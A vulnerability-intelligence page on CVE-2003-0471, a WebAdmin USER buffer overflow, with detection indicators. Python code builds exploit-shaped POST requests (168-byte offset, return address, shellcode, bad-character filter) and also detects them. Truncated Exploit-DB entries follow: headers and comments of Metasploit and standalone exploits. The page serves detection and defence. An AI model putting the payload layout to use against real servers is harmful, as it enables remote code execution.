CVE-2003-0471
Published: 2003-08-07
CVE-2003-0471: Buffer overflow in WebAdmin.exe for WebAdmin allows remote attackers to execute arbitrary code via an HTTP request to WebAdmin.dll with a long USER argument.
Priority: P3 (52), high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: public
EPSS: 60.95% (99.0th percentile)
Detection & IOCs (extracted from sources)
Request shape: User=<168-byte overflow>+<ret addr>+<shellcode>&Password=foo&languageselect=en&Theme=Heavy&Logon=Sign+In
Bad characters (bytes): \x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c
- Detect exploit attempts by matching HTTP POST requests to /WebAdmin.DLL?View=Logon with an oversized User= parameter in the POST body (the overflow offset is 168 bytes: the saved return address is overwritten by bytes 169-172 of the field).
- Alert on HTTP requests to /WebAdmin.DLL where the Content-Type is application/x-www-form-urlencoded and the raw User= POST field is longer than 168 bytes. Any working payload is strictly longer, since it must also carry the return address and the shellcode; measure the field before URL-decoding, because the exploits send raw bytes.
- Fingerprint vulnerable versions by checking the HTTP response body for the pattern /v2\.0\.4|v2\.0\.3|v2\.0\.2|v2\.0\.1/ on the WebAdmin service (default port 1000).
- Monitor for exploitation of WebAdmin on TCP port 1000, the default service port targeted by all known exploit variants.
- Payload bad characters for this exploit are \x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c; shellcode in the User= field must avoid these bytes, so a long User= value made of non-printable bytes that contains none of them is a strong indicator of encoded shellcode rather than a typed username.
- Successful exploitation results in code execution with SYSTEM-level privileges; monitor for WebAdmin.exe spawning unexpected child processes (e.g., cmd.exe) on Windows hosts.
- The exploit targets WebAdmin versions 2.0.1 through 2.0.4; version 2.0.5 is the patched release. Return addresses are version-specific and hardcoded per DLL build; using the wrong target offset crashes the service without code execution, so a WebAdmin.exe crash with no child process is itself worth investigating as a failed attempt.
- The download-and-execute shellcode variant (exploit 22834) crashes the server after execution; an attacker would need to restart the WebAdmin service to restore access.
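The IOCs above come down to a little raw parsing: split the form body on the undecoded bytes, measure User=, and compare against the 168-byte offset. The Python below is an added example written for this page (it is not code from the page, from Exploit-DB, or from the Metasploit module): it builds a request laid out as described (168 bytes of filler, a 4-byte return address, then shellcode), checks the payload against the bad-character list, and runs the detection checks and the version fingerprint over constructed samples. The return address and shellcode are placeholder bytes, and the host 192.0.2.10 is a documentation address; none of them is taken from the real exploits.

```python
import re

# Facts taken from the IOC list above: the saved return address sits 168 bytes into
# User=, WebAdmin listens on TCP/1000 by default, the logon handler is /WebAdmin.DLL,
# builds v2.0.1-v2.0.4 are unpatched, and the bytes below break the form parser.
OVERFLOW_OFFSET = 168
DEFAULT_PORT = 1000
LOGON_PATH = b"/webadmin.dll"
BAD_CHARS = b"\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c"
VULN_VERSION_RE = re.compile(rb"v2\.0\.[1-4]")


def bad_chars_in(payload: bytes) -> set:
    """Forbidden bytes present in payload; an empty set means the form parser passes it through."""
    return set(payload) & set(BAD_CHARS)


def build_user_field(ret_addr: bytes, shellcode: bytes) -> bytes:
    """Lay out User= as <168 bytes filler><ret addr><shellcode>, refusing payloads that would be mangled."""
    if len(ret_addr) != 4:
        raise ValueError("return address must be 4 bytes (x86)")
    bad = bad_chars_in(ret_addr + shellcode)
    if bad:
        raise ValueError("payload contains bad chars: %s" % sorted(bad))
    return b"A" * OVERFLOW_OFFSET + ret_addr + shellcode


def build_post(user_field: bytes, host: bytes = b"192.0.2.10") -> bytes:
    """Wrap a User= value in the logon POST shape the exploit variants send."""
    body = (b"User=" + user_field +
            b"&Password=foo&languageselect=en&Theme=Heavy&Logon=Sign+In")
    return (b"POST /WebAdmin.DLL?View=Logon HTTP/1.1\r\n"
            b"Host: " + host + b":" + str(DEFAULT_PORT).encode() + b"\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)


def parse_form(body: bytes) -> dict:
    """Split a urlencoded body on & and the first = WITHOUT decoding, so lengths reflect raw bytes."""
    fields = {}
    for pair in body.split(b"&"):
        if pair:
            name, _, value = pair.partition(b"=")
            fields[name] = value
    return fields


def analyze_request(raw: bytes) -> dict:
    """Apply the IOCs to one raw HTTP request and return the evidence plus a verdict."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target = (lines[0].split(b" ") + [b"", b""])[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    path = target.split(b"?", 1)[0].lower()
    user = parse_form(body).get(b"User", b"")
    # Typed usernames are printable; raw x86 shellcode mostly is not.
    binary = sum(1 for b in user if b < 0x20 or b > 0x7e)
    evidence = {
        "to_webadmin_dll": method == b"POST" and path == LOGON_PATH,
        "form_encoded": headers.get(b"content-type", b"").lower()
                        .startswith(b"application/x-www-form-urlencoded"),
        "user_len": len(user),
        "oversized": len(user) > OVERFLOW_OFFSET,
        "binary_bytes": binary,
        "bad_chars_absent": not bad_chars_in(user),
    }
    evidence["verdict"] = ("exploit_attempt"
                           if evidence["to_webadmin_dll"] and evidence["oversized"]
                           else "benign")
    return evidence


def vulnerable_version(response_body: bytes):
    """Fingerprint an unpatched build (v2.0.1-v2.0.4) from a WebAdmin response body."""
    m = VULN_VERSION_RE.search(response_body)
    return m.group(0).decode() if m else None


# Constructed samples, not captures: the placeholders stand in for a real return
# address and real shellcode, and were chosen to contain none of the bad chars.
PLACEHOLDER_RET = b"\xef\xbe\xad\xde"
PLACEHOLDER_SC = b"\x90" * 16 + b"\xcc"
BENIGN_REQUEST = build_post(b"alice")
EXPLOIT_REQUEST = build_post(build_user_field(PLACEHOLDER_RET, PLACEHOLDER_SC))

if __name__ == "__main__":
    for name, req in (("benign", BENIGN_REQUEST), ("exploit", EXPLOIT_REQUEST)):
        print(name, analyze_request(req))
    print(vulnerable_version(b"<title>WebAdmin v2.0.4</title>"))
```

The length check is done on the raw field rather than after URL-decoding on purpose: the bad-character list exists precisely because the server's form parser, not a decoder, is what sees these bytes, so a detector that decodes first would mis-measure a payload containing `%`-like sequences that happen to be valid encodings. The `binary_bytes` and `bad_chars_absent` fields are supporting evidence only; the verdict keys on the path and the 168-byte threshold, as the IOCs do.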
No detection rules found.
Exploit-DB
Alt-N WebAdmin - USER Buffer Overflow (Metasploit)
exploitdb · 2010-02-15
---
##
# $Id: altn_webadmin.rb 8498 2010-02-15 00:48:03Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

# Standard Metasploit 3 remote-exploit header; the HttpClient mixin supplies the
# HTTP client used to send the oversized USER logon POST.
class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Alt-N WebAdmin USER Buffer Overflow',
			'Description'    => %q{
					Alt-N WebAdmin is prone to a buffer overflow condition. This
				is due to insufficient bounds checking on the USER
				parameter. Successful exploitation could result in code
				execution with SYSTEM level privileges.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 8498 $',
			'References'     =>
				[
					[ 'CVE', '20
Exploit-DB
Alt-N WebAdmin 2.0.4 - USER Buffer Overflow (Metasploit)
exploitdb · 2005-09-11
---
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::altn_webadmin;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Alt-N WebAdmin USER Buffer Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'y0 [at] w00t-shell.net', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC'
Exploit-DB
Alt-N WebAdmin 2.0.x - 'USER' Remote Buffer Overflow (2)
exploitdb · 2003-06-24
---
// source: https://www.securityfocus.com/bid/8024/info
Alt-N WebAdmin is prone to a buffer overflow condition. This is due to insufficient bounds checking on the USER parameter. Successful exploitation could result in code execution with SYSTEM level privileges.
/* WebAdmin.dll remote download exec shellcode. Works on 2.0.3 and 2.0.4, all Windows SPs.
Oh, and my previous exploit: I'm an idiot, and 2.0.5 *is* the patch, heh.
This shellcode was used by ThreaT in his vulnreg.reg exploit; it works quite nicely.
Look at the bottom of the code for some trojan.exe ideas. That one I found somewhere but
I can't remember where.
The shellcode has one minor suck point: it shows a window on the target host. Oh, and the exploit
crashes the server, so
Exploit-DB
Alt-N WebAdmin 2.0.x - 'USER' Remote Buffer Overflow (1)
exploitdb · 2003-06-24
---
// source: https://www.securityfocus.com/bid/8024/info
Alt-N WebAdmin is prone to a buffer overflow condition. This is due to insufficient bounds checking on the USER parameter. Successful exploitation could result in code execution with SYSTEM level privileges.
/* WebAdmin.dll remote proof of concept, 2.0.4 version. Tried finding 2.0.5, but all versions
on the download sites were already patched. This was tested on a win2ksp2 server; I suggest
using better shellcode, this is just something I know works. It just opens a cmd.exe prompt
on the victim box. I imagine this won't be too much harder to exploit with 2.0.5 unpatched.
This took me about 1 hour to write and it was my first remote win32 exploit. Thank you Alt-N :D.
Word to Mark
Metasploit
Alt-N WebAdmin USER Buffer Overflow
Alt-N WebAdmin is prone to a buffer overflow condition. This is due to insufficient bounds checking on the USER parameter. Successful exploitation could result in code execution with SYSTEM level privileges.
No writeups or analysis indexed.
References:
http://marc.info/?l=bugtraq&m=105647081418155&w=2
http://marc.info/?l=bugtraq&m=105648385900792&w=2
http://www.osvdb.org/2207
http://www.securityfocus.com/bid/8024